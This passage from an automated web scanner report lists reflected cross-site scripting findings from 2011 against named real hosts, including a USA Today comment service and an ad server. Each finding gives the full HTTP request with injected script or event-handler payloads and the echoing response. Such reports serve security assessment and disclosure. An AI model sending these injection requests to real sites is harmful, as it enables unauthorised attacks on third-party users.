plcb0110ce<script>alert(1)</script>11b5095b103('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\">
...[SNIP]...

2.106. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkey request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 65069><img%20src%3da%20onerror%3dalert(1)>cc5552da031 was submitted in the plckcommentonkey parameter. This input was echoed as 65069><img src=a onerror=alert(1)>cc5552da031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=46732364.story65069><img%20src%3da%20onerror%3dalert(1)>cc5552da031&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:39:06 GMT
Connection: close
Content-Length: 34352

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_comments_68630\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"46732364.story65069><img src=a onerror=alert(1)>cc5552da031\" commentOnKeyType=\"article\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

2.107. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkeytype request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6993e><img%20src%3da%20onerror%3dalert(1)>03214fcf160 was submitted in the plckcommentonkeytype parameter. This input was echoed as 6993e><img src=a onerror=alert(1)>03214fcf160 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article6993e><img%20src%3da%20onerror%3dalert(1)>03214fcf160&plckcommentonkey=46732364.story&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:38:58 GMT
Connection: close
Content-Length: 34697

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
mments_94908\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"46732364.story\" commentOnKeyType=\"article6993e><img src=a onerror=alert(1)>03214fcf160\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

2.108. http://w10.localadbuy.com/servlet/ajrotator/2735/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/2735/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 288f6<script>alert(1)</script>9a54fef53a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet288f6<script>alert(1)</script>9a54fef53a/ajrotator/2735/0/vj?z=1&dim=407&pos=2&kw=business&pv=2784063408616931&nc=12160664&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:02 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet288f6<script>alert(1)</script>9a54fef53a/ajrotator/2735/0/vj not found</pre>
<BR>

2.109. http://w10.localadbuy.com/servlet/ajrotator/2735/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/2735/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dff80<script>alert(1)</script>6fbd07804ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotatordff80<script>alert(1)</script>6fbd07804ba/2735/0/vj?z=1&dim=407&pos=2&kw=business&pv=2784063408616931&nc=12160664&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:02 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotatordff80<script>alert(1)</script>6fbd07804ba/2735/0/vj not found</pre>
<BR>

2.110. http://w10.localadbuy.com/servlet/ajrotator/541/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/541/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 49990<script>alert(1)</script>42110efa79f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet49990<script>alert(1)</script>42110efa79f/ajrotator/541/0/vj?z=1&dim=399&pos=4&kw=business&pv=2784063408616931&nc=91906287&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:18 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet49990<script>alert(1)</script>42110efa79f/ajrotator/541/0/vj not found</pre>
<BR>

2.111. http://w10.localadbuy.com/servlet/ajrotator/541/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/541/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 204c1<script>alert(1)</script>890dbe70db7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator204c1<script>alert(1)</script>890dbe70db7/541/0/vj?z=1&dim=399&pos=4&kw=business&pv=2784063408616931&nc=91906287&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:18 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator204c1<script>alert(1)</script>890dbe70db7/541/0/vj not found</pre>
<BR>

2.112. http://w10.localadbuy.com/servlet/ajrotator/543/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/543/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84d31<script>alert(1)</script>e398163a75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet84d31<script>alert(1)</script>e398163a75/ajrotator/543/0/vj?z=1&dim=399&pos=3&kw=homepage&pv=298638020176442&nc=64783188&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fdefault.aspx&refer=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:39:43 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet84d31<script>alert(1)</script>e398163a75/ajrotator/543/0/vj not found</pre>
<BR>

2.113. http://w10.localadbuy.com/servlet/ajrotator/543/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/543/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 49b08<script>alert(1)</script>83ea7d8e48d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator49b08<script>alert(1)</script>83ea7d8e48d/543/0/vj?z=1&dim=399&pos=3&kw=homepage&pv=298638020176442&nc=64783188&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fdefault.aspx&refer=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:39:44 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator49b08<script>alert(1)</script>83ea7d8e48d/543/0/vj not found</pre>
<BR>

2.114. http://w10.localadbuy.com/servlet/ajrotator/546/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/546/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2d044<script>alert(1)</script>95aec28d31d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet2d044<script>alert(1)</script>95aec28d31d/ajrotator/546/0/vj?z=1&dim=399&pos=3&kw=business&pv=2784063408616931&nc=72887006&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:13 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet2d044<script>alert(1)</script>95aec28d31d/ajrotator/546/0/vj not found</pre>
<BR>

2.115. http://w10.localadbuy.com/servlet/ajrotator/546/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/546/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9946<script>alert(1)</script>cb71ce7c288 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotatorb9946<script>alert(1)</script>cb71ce7c288/546/0/vj?z=1&dim=399&pos=3&kw=business&pv=2784063408616931&nc=72887006&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:13 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotatorb9946<script>alert(1)</script>cb71ce7c288/546/0/vj not found</pre>
<BR>

2.116. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/550/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 354e5<script>alert(1)</script>7c956fd878a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet354e5<script>alert(1)</script>7c956fd878a/ajrotator/550/0/vj?z=1&dim=406&pos=1&kw=business&pv=2784063408616931&nc=38240663&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:03 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet354e5<script>alert(1)</script>7c956fd878a/ajrotator/550/0/vj not found</pre>
<BR>

2.117. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/550/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23c91<script>alert(1)</script>fc29d31c5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator23c91<script>alert(1)</script>fc29d31c5f/550/0/vj?z=1&dim=406&pos=1&kw=business&pv=2784063408616931&nc=38240663&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:04 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator23c91<script>alert(1)</script>fc29d31c5f/550/0/vj not found</pre>
<BR>

2.118. http://w10.localadbuy.com/servlet/ajrotator/551/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/551/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c1d1<script>alert(1)</script>a1d5365b88f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet2c1d1<script>alert(1)</script>a1d5365b88f/ajrotator/551/0/vj?z=1&dim=406&pos=4&kw=homepage&pv=298638020176442&nc=59843325&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fdefault.aspx&refer=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:39:45 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet2c1d1<script>alert(1)</script>a1d5365b88f/ajrotator/551/0/vj not found</pre>
<BR>

2.119. http://w10.localadbuy.com/servlet/ajrotator/551/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/551/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3a9f7<script>alert(1)</script>6b4ddb0cab5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator3a9f7<script>alert(1)</script>6b4ddb0cab5/551/0/vj?z=1&dim=406&pos=4&kw=homepage&pv=298638020176442&nc=59843325&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fdefault.aspx&refer=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:39:45 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator3a9f7<script>alert(1)</script>6b4ddb0cab5/551/0/vj not found</pre>
<BR>

2.120. http://wvue.web.entriq.net/nw/dpm/loadplayer/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://wvue.web.entriq.net
Path:   /nw/dpm/loadplayer/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a1658<a>f37537d35d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The error text also shows that this path segment is used to build a filesystem path, templates/user/wvue/layouts/<value>.xml, so the parameter deserves review for how the path is constructed as well as for output encoding.

Request

GET /nwa1658<a>f37537d35d2/dpm/loadplayer/?instanceGUID=5ED1F7E8-1A85-BA06-44C9-9FD864CC049C&affiliateGUID=&mt=1&playerID=DayPortPlayerCallBack.DayPortPlayer_0&domain=wvue.web.entriq.net&v=2011491537 HTTP/1.1
Host: wvue.web.entriq.net
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 15:38:07 GMT
Server: Apache
X-Host: w3
Vary: Accept-Encoding
Cache-Control: max-age=60
Expires: Mon, 09 May 2011 15:39:07 GMT
Content-Type: text/html
Content-Length: 674

</table>&nbsp;Invalid Layout File: The layout file templates/user/wvue/layouts/nwa1658<a>f37537d35d2.xml or an appropriate 404 alternative does not exist<br><br><br><br><br><br><br><br><br><br><br><br
...[SNIP]...

2.121. http://wvue.web.entriq.net/nw/dpm/loadplayer/ [playerID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://wvue.web.entriq.net
Path:   /nw/dpm/loadplayer/

Issue detail

The value of the playerID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 18a4c(a)2aba04c4501 was submitted in the playerID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Two points qualify the finding. The response is served as text/javascript, so injected code runs only when this URL is loaded through a script element (as the embedding fox8live.com page loads it), not when the URL is opened directly in a browser. And the probe as echoed leaves the file syntactically invalid, since a call expression is followed immediately by the token 2aba04c4501, so any working injection would have to keep the surrounding assignment parseable.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nw/dpm/loadplayer/?instanceGUID=5ED1F7E8-1A85-BA06-44C9-9FD864CC049C&affiliateGUID=&mt=1&playerID=DayPortPlayerCallBack.DayPortPlayer_018a4c(a)2aba04c4501&domain=wvue.web.entriq.net&v=2011491537 HTTP/1.1
Host: wvue.web.entriq.net
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
